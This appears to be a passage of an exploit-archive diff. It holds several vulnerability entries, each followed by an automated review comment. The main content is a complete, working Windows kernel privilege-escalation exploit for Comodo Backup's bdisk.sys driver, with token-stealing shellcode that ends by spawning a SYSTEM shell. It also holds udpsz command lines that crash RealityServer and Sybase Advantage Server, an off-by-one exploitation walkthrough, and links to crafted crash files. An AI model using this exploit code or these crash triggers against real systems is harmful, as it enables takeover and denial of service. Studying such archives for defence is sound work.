15/16-Jan-2015 found the vulnerability
16-Jan-2015 - informed the developers (see [3])
16-Jan-2015 release date of this security advisory [without technical
details]
21-Jan-2015 - attempt #2 to inform the developer via mail
22-Jan-2015 - vendor responded, technical details posted to Github (see [3])
22-Jan-2015 - release date of this security advisory
22-Jan-2015 - send to lists
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS
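Review bot: the Solution section gives an operator nothing to act on while `Vendor Status: vendor will patch eventually` stands. It should at least list the interim controls the findings imply: HTML-escape the username before it is written to the log viewed at `admin.php?type=log&action=read` (that stored XSS is fed from the unauthenticated login form, which makes it the most serious item), encode `action` and the page title on output, bind `p` as an integer in each `action=update` handler listed, and deny script execution under `custom/uploads/` or move uploads out of the web root, since `{TARGET}/custom/uploads/{NAME_OF_THE_UPLOADED_FILE}` is fetchable without authentication. Minor: the uploader URL uses `http://localhost/ferretCMS/` where every other location uses `{TARGET}`, and `CVE-ID: -` should be filled in once assigned.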

platforms/windows/dos/35895.txt Executable file
@ -0,0 +1,88 @@
source: http://www.securityfocus.com/bid/48476/info
RealityServer Web Services is prone to a remote denial-of-service vulnerability caused by a NULL pointer dereference.
Attackers can exploit this issue to cause the server to dereference an invalid memory location, resulting in a denial-of-service condition. Due to the nature of this issue arbitrary code-execution maybe possible; however this has not been confirmed.
RealityServer Web Services 3.1.1 build 144525.5057 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/35895.zip
#######################################################################
Luigi Auriemma
Application: NVIDIA RealityServer
http://www.realityserver.com/products/realityserver.html
http://www.nvidia.com/object/realityserver.html
Versions: <= 3.1.1 build 144525.5057
Platforms: Windows and Linux
Bug: NULL pointer
Exploitation: remote, versus server
Date: 27 Jun 2011 (found and reported on my forum 04 Dec 2010)
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"The RealityServer? platform is a powerful combination of NVIDIA?
Tesla? GPUs and 3D web services software that delivers interactive,
photorealistic applications over the web, enabling product designers,
architects and consumers to easily visualize 3D scenes with remarkable
realism."
#######################################################################
======
2) Bug
======
If the byte at offset 0xc01 of the packet is >= 0x80 there will be a
NULL pointer dereference.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
udpsz -C 03 -b 0xff -T SERVER 1935 0xc02
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
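Review bot: the classification does not match the advisory, and the trigger is not reproducible from the text alone. The file sits under `platforms/windows/dos/` while the advisory states `Platforms: Windows and Linux` and `Exploitation: remote, versus server`, so the Linux build should be flagged as affected too. Section 3 points only to an external tool (`udpsz`) and the `35895.zip` mirror; the bug statement `If the byte at offset 0xc01 of the packet is >= 0x80 there will be a NULL pointer dereference` is enough for a detection rule on port 1935 traffic, but the advisory should name the listening service and the message type the packet belongs to. `4) Fix: No fix.` carries a 2011 date on a 2015 entry and deserves a note on whether a later RealityServer release corrected it; the SecurityFocus summary's `arbitrary code-execution maybe possible` also goes beyond what the author's own `Bug: NULL pointer` supports.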

@ -0,0 +1,29 @@
Title : VLC Player 2.1.5 DEP Access Violation Vulnerability
Discoverer: Veysel HATAS (@muh4f1z)
Web page : www.binarysniper.net
Vendor : VideoLAN VLC Project
Test: Windows XP SP3
Status: Fixed
Severity : High
CVE ID : CVE-2014-9597
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9597>
NIST: ?https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597
OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450>
VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389>
windbglog : windbglog.txt
<https://trac.videolan.org/vlc/attachment/ticket/13389/windbglog.txt>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015
Description : VLC Media Player contains a flaw that is triggered as
user-supplied input is not properly sanitized when handling a specially crafted
FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a
context-dependent attacker to corrupt memory and potentially execute
arbitrary code.
## EDB Mirror: http://www.exploit-db.com/sploits/35901-poc.flv
## EDB Mirror: http://www.exploit-db.com/sploits/35901-windbglog.txt
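Review bot: `Status: Fixed` is asserted without a fixed VLC version, and the only artefacts are off-site links without hashes. The crafted FLV is hosted on `datafilehost.com` and the crash log on the VLC trac attachment, so a reader cannot confirm they hold the same samples the EDB mirrors (`35901-poc.flv`, `35901-windbglog.txt`) preserve; add SHA-256 values for both. The description (`user-supplied input is not properly sanitized when handling a specially crafted FLV file`) never states which demuxer or function faults, and `DEP Access Violation` in the title is a symptom rather than a bug class; the referenced windbg log should support a one-line statement of the faulting module and whether the access is a read or a write, which is what a triager needs to rate the `Severity : High` claim.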

platforms/windows/local/35905.c Executable file
@ -0,0 +1,270 @@
/*
Exploit Title - Comodo Backup Null Pointer Dereference Privilege Escalation
Date - 23rd January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.comodo.com
Tested Version - 4.4.0.0
Driver Version - 1.0.0.957 - bdisk.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/112828
CVE ID - CVE-2014-9633
Vendor fix url - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html
Fixed version - 4.4.1.23
Fixed Driver Ver - 1.0.0.972
Note
----
Does not cleanly exit, had to use some leave instructions to get the command
prompt. If you know of a better way please do let me know.
Below in from Windows XP in IofCallDriver function.
eax = 12h
804e37fe 8b7108 mov esi,dword ptr [ecx+8] <- control the null page as ecx = 00000000
804e3801 52 push edx
804e3802 51 push ecx
804e3803 ff548638 call dword ptr [esi+eax*4+38h] ds:0023:00000080=00000090
804e3807 5e pop esi
804e3808 c3 ret
esi + eax*4 + 38h = 0 + 48 + 38 = 80h if ESI is null
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE token_steal_w7[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W7_TOKEN,0x00,0x00,0x00, // mov [eax+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE ESInull[] = "\x00\x00\x00\x00";
BYTE RETaddr[] = "\x90\x00\x00\x00";
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtAllocateVirtualMemory NtAllocateVirtualMemory;
NTSTATUS allocstatus;
LPVOID base_addr = (LPVOID)0x00000001;
DWORD written;
int rwresult;
int size = BUFSIZE;
HANDLE hDevice;
unsigned char buffer[BUFSIZE];
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "bdisk");
NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
if (!NtAllocateVirtualMemory)
{
printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
return -1;
}
printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
printf("[+] Allocating memory at [0x%p]\n", base_addr);
allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocstatus)
{
printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus);
printf("Error : %d\n", GetLastError());
return -1;
}
printf("[+] NtAllocateVirtualMemory successful\n");
memset(buffer, 0x90, BUFSIZE);
memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1);
memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
else if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 7\n");
memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
if (rwresult == 0)
{
printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
return -1;
}
printf("[+] WriteProcessMemory %d bytes written\n", written);
printf("[~] Press any key to Exploit . . .\n");
getch();
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
spawnShell();
return 0;
}
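Review bot: `getch()` at the "Press any key to Exploit" prompt is used without `#include <conio.h>`, so the file only builds through an implicit declaration; add the include or drop the pause. Two smaller points in the same file: `si.cb = sizeof(si);` is assigned twice in `spawnShell()`, and `size` is declared `int` but passed as `&size` to `NtAllocateVirtualMemory`, whose `RegionSize` parameter is typed `PULONG` in the prototype above it (likewise `devhandle` is `unsigned char[]` but handed to `sprintf` and `CreateFile`, which take `char*`); declaring `ULONG size` and `char devhandle[MAX_PATH]` removes the mismatches. The header block is the part worth keeping as-is: it names the CVE, the vulnerable driver build (1.0.0.957, bdisk.sys) and the fixed driver build (1.0.0.972), which is exactly what a defender needs to confirm an install is patched.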

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48389/info
Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error.
An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
Wireshark 1.4.5 is vulnerable.
http://www.exploit-db.com/sploits/35873.pcap
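Review bot: the write-up gives only the product version and a link to a .pcap; it does not say which dissector or function hits the NULL-pointer dereference, how the capture triggers it (opening it in Wireshark 1.4.5), or which release fixed it, so a reader cannot verify the crash or tell whether a later build is affected. A one-line note on the trigger and the fixed version would make the entry usable.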

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48462/info
Ubisoft CoGSManager ActiveX control is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds check user-supplied input.
Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.
Ubisoft CoGSManager ActiveX control 1.0.0.23 is vulnerable.
http://www.exploit-db.com/sploits/35885.zip
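Review bot: the description never identifies the control itself (CLSID or ProgID) nor the method and argument whose bounds check fails, and the only artifact is an opaque zip, so a reader cannot tell which installed control is affected or verify the overflow. Name the control identifier and the overflowing method/parameter alongside the 1.0.0.23 version already given.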

@ -0,0 +1,155 @@
source: http://www.securityfocus.com/bid/48464/info
Sybase Advantage Server is prone to an off-by-one buffer-overflow vulnerability.
Attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
Sybase Advantage Server 10.0.0.3 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/35886.zip
#######################################################################
Luigi Auriemma
Application: Sybase Advantage Server
http://www.sybase.com/products/databasemanagement/advantagedatabaseserver
Versions: <= 10.0.0.3
Platforms: Windows, NetWare, Linux
Bug: off-by-one
Exploitation: remote, versus server
Date: 27 Jun 2011 (found 29 Oct 2010)
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"Advantage Database Server is a full-featured, easily embedded,
client-server, relational database management system that provides you
with Indexed Sequential Access Method (ISAM) table-based and SQL-based
data access."
#######################################################################
======
2) Bug
======
By default the Advantage server (ADS process) listens on the UDP and
TCP ports 6262 and optionally is possible to specify also a so called
"internet port" for non-LAN connections.
The problem is enough unusual and affects the code that handles a
certain type of packets on the UDP port.
In short the server does the following:
- it uses memcpy to copy the data from the packet into a stack buffer
of exactly 0x2b8 bytes (handled as 0x2b9 bytes)
- later this data is handled as a string but no final NULL byte
delimiter is inserted
- there is also an off-by-one bug since one byte overwrites the lower
8bit value of a saved element (a stack pointer 017bff??)
- after this buffer are located some pushed elements and obviously the
return address of the function
- it calls the OemToChar API that changes some bytes of the buffer
(like those major than 0x7f) till it reaches a 0x00 that "luckily" is
after the return address
- so also the return address gets modified, exactly from 0084cb18 to
00e42d18 that ironically is a valid stack frame somewhat related to
the starting of the service
- the data inside this stack address doesn't seems changeable from
outside and has tons of 0x00 bytes that in this case act like NOPs
till the zone around 00ebf05b where are located some pushed elements
- the EBX register contains two bytes of the attacker's data and EBP
points to such data
the following is a resume of these operations:
017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 FF 7B aaaaaaaaaaaaaa?{
017BF67B 01 99 26 C1 71 BC F6 7B 01 18 CB 84 00 00 00 00 .?&?q??{..?....
|---------|
original return address
0084B81D |. FF15 DC929000 CALL DWORD PTR DS:[<&USER32.OemToCharA>]
017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 A0 7B aaaaaaaaaaaaaa?{
017BF67B 01 D6 26 2D 71 2B F7 7B 01 18 2D E4 00 00 00 00 .?&-q+?{..-?....
|---------|
new return address
00E42D18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00E42D28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
...
00EBF04B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00EBF05B 00 99 78 82 7C 4A EC 82 7C 20 00 00 00 A0 F0 EB .?x?|J??| ...???
00EBF06B 00 A0 F0 EB 00 00 00 00 00 68 F1 EB 00 01 00 00 .???.....h??....
00EBF07B 00 5C F1 EB 00 D1 0F E7 77 A0 F0 EB 00 00 00 00 .\??.?.?w???....
00EBF08B 00 51 02 02 00 EC 0F E7 77 00 D0 FD 7F 00 00 00 .Q...?.?w.??...
00EBF09B 00 01 00 00 00 18 00 34 00 02 00 00 00 7C 0A 00 .......4.....|..
00EBF0AB 00 14 0D 00 00 1C 75 17 00 00 00 00 00 00 00 00 ......u.........
00EBF0BB 00 51 02 02 00 08 00 00 C0 00 00 00 00 00 00 00 .Q......?.......
the code flow usually arrives till 00ebf0ab or other addresses close
to it depending by the data saved there when the service started.
Now for exploiting this vulnerability would be required the presence of
a "jmp ebp" or "call ebp" or a sequence of instructions with a similar
result in the 00ebf05b zone which looks like an enough rare event.
I have not tested the Linux and NetWare platforms so I don't know if
the problem exists also there and if there are more chances of
exploiting it.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/ads_crc.zip
udpsz -C 0012 -L ads_crc.dll -b 0x61 SERVER 6262 0x592
#######################################################################
======
4) Fix
======
No fix.
UPDATE:
vendor has fixed the bug in version 10.10.0.16 released in July 2011:
http://devzone.advantagedatabase.com/dz/content.aspx?key=44&id=ef0915fb-44c2-fe4b-ac26-9ed3359cffff
#######################################################################
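Review bot: section 4 opens with "No fix." and is then contradicted by the UPDATE stating the vendor fixed the bug in 10.10.0.16; drop the stale "No fix." line and state the fixed version in the header block next to `Versions: <= 10.0.0.3`, so the first screen of the advisory answers whether a deployment is patched. The udpsz command line in section 3 is also given without saying what `ads_crc.dll` contributes or what the `-C 0012` argument selects, so the reproduction step cannot be understood from the text alone; a one-line note on each would help.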